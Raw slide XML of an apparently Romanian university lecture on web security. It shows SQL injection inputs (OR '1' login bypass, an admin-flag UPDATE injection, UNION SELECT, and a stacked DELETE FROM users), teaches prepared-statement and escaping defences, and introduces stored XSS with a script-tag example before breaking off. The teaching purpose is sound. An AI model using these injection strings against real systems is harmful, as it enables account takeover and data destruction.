          <a:p>
            <a:pPr indent="-334327" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Prin urmare, serverul va executa instructiunea SQL:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>SELECT * FROM users where user='forest' and password='wrong' OR '1'</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Care totdeauna returneaza ceva datorita lui </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OR ’1’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>=&gt; utilizatorul ‘forest’ e totdeauna autentificat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 exemple de SQL injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191" name="Google Shape;191;p3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uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://example.com/show.php?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>bug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>id=12</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>34 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OR True</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>SELECT * FROM Bugs WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>bug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>id=1234 OR True</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://example.com/changepassword.php?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>accountid=1234 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OR True</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>&amp;password=1234</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’),admin=(‘1</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>UPDATE Accounts SET Password=SHA2(‘1234’), admin=(‘1’) WHERE accountid=1234 OR True</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>SQL injection poate aparea si in ORM-uri (de ex. hibernate) care ne lasa sa construim interogari specifice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Alte exemple de SQL injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="197" name="Google Shape;197;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http://localhost/~forest/security/sql-injection/example-1/authenticate.php?user=forest&amp;pass=wrong' UNION select all 1,2,3,4+'</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 poate pe unele platforme si sa executam mai multe instructiuni SQL impreuna:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>http://localhost/~forest/security/sql-injection/example-1/authenticate.php?user=forest&amp;pass=wrong'; DELETE from users --'     (for Microsoft SQL server 2000)</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6592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Prevenirea SQL injection. Parametrizare interogari SQL</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="203" name="Google Shape;203;p3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Ideea principala consta in parametrizarea interogarilor SQL; adica sa nu se foloseasca direct datele de la utilizator in instructiuni SQL, ci sa se mapeze parametrii de la utilizator pe un set pre-definit de valori si acestea sa se foloseasca in instructiuni SQL =&gt; nu e totdeauna usor</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>De ex., daca parametrul de la utilizator e ‘rolul userului’ (e.g. admin sau operator sau utilizator normal), mapam parametrul de la utilizator pe aceste 3 valori fixe si apoi folosim parametrul in interogare SQL</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Folosirea de PreparedStatement, nu instructiuni SQL simple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500"/>
              <a:t>Prevenirea SQL injection in PHP prin prepared statements</a:t>
            </a:r>
            <a:endParaRPr sz="2500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="209" name="Google Shape;209;p3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6464E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$stmt = $pdo-&gt;prepare("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>SELECT * FROM users where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="36464E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> user=:user and pass= :password");</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="36464E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F5F5F5"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="36464E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$stmt-&gt;bindParam(':user', $user);</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="36464E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F5F5F5"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="36464E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$stmt-&gt;bindParam(':pass', $password);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500"/>
              <a:t>Prevenirea SQL injection in Java prin prepared statements</a:t>
            </a:r>
            <a:endParaRPr sz="2500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="215" name="Google Shape;215;p3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6464E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="36464E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F5F5F5"/>
                </a:highlight>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="36464E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="36464E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F5F5F5"/>
                </a:highlight>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="36464E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>.getParameter("user");</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="36464E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="36464E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F5F5F5"/>
                </a:highlight>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="36464E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="36464E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F5F5F5"/>
                </a:highlight>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="36464E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>.getParameter("password");</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="36464E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="36464E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F5F5F5"/>
                </a:highlight>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="36464E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="36464E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F5F5F5"/>
                </a:highlight>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="36464E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F5F5F5"/>
                </a:highlight>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>"SELECT * FROM users WHERE user= ? and pass = ?";</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="36464E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F5F5F5"/>
                </a:highlight>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="36464E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F5F5F5"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="36464E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PreparedStatement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="36464E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F5F5F5"/>
                </a:highlight>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="36464E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pstmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="36464E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F5F5F5"/>
                </a:highlight>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="36464E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F5F5F5"/>
                </a:highlight>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="36464E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>connection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>.prepareStatement(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="36464E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F5F5F5"/>
                </a:highlight>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="36464E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="36464E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F5F5F5"/>
                </a:highlight>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="36464E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F5F5F5"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="36464E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pstmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>.setString(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="36464E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F5F5F5"/>
                </a:highlight>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>1,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="36464E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F5F5F5"/>
                </a:highlight>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="36464E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="36464E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pstmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>.setString(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="36464E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F5F5F5"/>
                </a:highlight>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>2,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="36464E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F5F5F5"/>
                </a:highlight>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="36464E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="36464E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ResultSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="36464E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F5F5F5"/>
                </a:highlight>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="36464E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>results</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="36464E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F5F5F5"/>
                </a:highlight>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="36464E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F5F5F5"/>
                </a:highlight>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="36464E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pstmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>.executeQuery(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="36464E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F5F5F5"/>
                </a:highlight>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>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Prevenire SQL injection prin filtrare/sanitizare parametrii de intrare</a:t>
            </a:r>
            <a:endParaRPr sz="2200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="221" name="Google Shape;221;p4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 foloseste o functie care recodifica parametrii (de tip string) evitand intelesup special al unor caractere (NUL (ASCII 0), \n, \r, \, ', ", si Control-Z).</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Exemplu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>PHP + Mysql:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>$con = mysqli_connect("localhost", "forest1", "secret", "forest");</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>$userid = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysqli_real_escape_string($con, $_GET['id'])</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>$result = mysqli_query($con, "SELECT * FROM users where id=" . $userid);</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Cross-site scripting (XSS)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Cunostinte premergatoare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 este XSS ?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="232" name="Google Shape;232;p4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XSS = injectarea in documentul curent de cod javascript de catre un atacator rau intentionat</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Injectarea de cod javascript se realizeaza de obicei prin transmiterea acestui cod Js in cadrul parametrilor unei cereri HTTP (i.e. QUERY_STRING-ul cererii HTTP GET sau POST), acesti parametrii nu sunt validati suficient la server (i.e. back-end) si ei ajung sa fie transmisi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>de catre server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>la client (browser) -asa cum sunt definiti de utilizatorul rau intentionat- sau sunt salvati la server intr-o baza de date si serviti la client (browser) direct din baza de date.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Prin XSS se pot fura date de la utilizator (din browser), se poate fura sesiunea HTTP (session hijacking)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Exemplu XSS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238" name="Google Shape;238;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2471025"/>
            <a:ext cx="8520600" cy="209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Utilizatorul rau intentionat va introduce 'Product1' si '&lt;script&gt;alert("test") &lt;/script&gt;' in cele doua campuri si v-a trimite datele la server.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Serverul va salva aceste doua date direct in baza de date, iar cand un alt utilizator vrea sa vizualizeze toate produsele in browser, codul Javascript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>'&lt;script&gt;alert("test") &lt;/script&gt;' adus direct din baza de date va rula in browserul utilizatorului normal.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="239" name="Google Shape;239;p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1788474" y="1058225"/>
            <a:ext cx="3856300" cy="1224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Alt e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>xemplu XSS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="245" name="Google Shape;245;p4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 Javascript care fura sesiunea HTTP curenta (i.e. session hijacking):</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
